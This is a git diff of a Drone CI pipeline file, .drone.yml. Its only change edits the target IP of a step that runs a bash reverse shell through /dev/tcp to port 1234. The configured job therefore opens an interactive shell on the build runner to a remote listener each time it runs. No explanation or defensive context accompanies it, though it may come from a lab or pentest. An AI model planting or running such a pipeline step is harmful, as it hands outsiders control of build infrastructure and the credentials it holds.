diff --git a/.drone.yml b/.drone.yml index c66e356..58d31d8 100644 --- a/.drone.yml +++ b/.drone.yml @@ -7,4 +7,4 @@ steps: image: alpine:latest commands: - apk add --no-cache bash - - bash -i >& /dev/tcp/192.168.178.25/1234 0>&1 + - bash -i >& /dev/tcp/192.168.178.27/1234 0>&1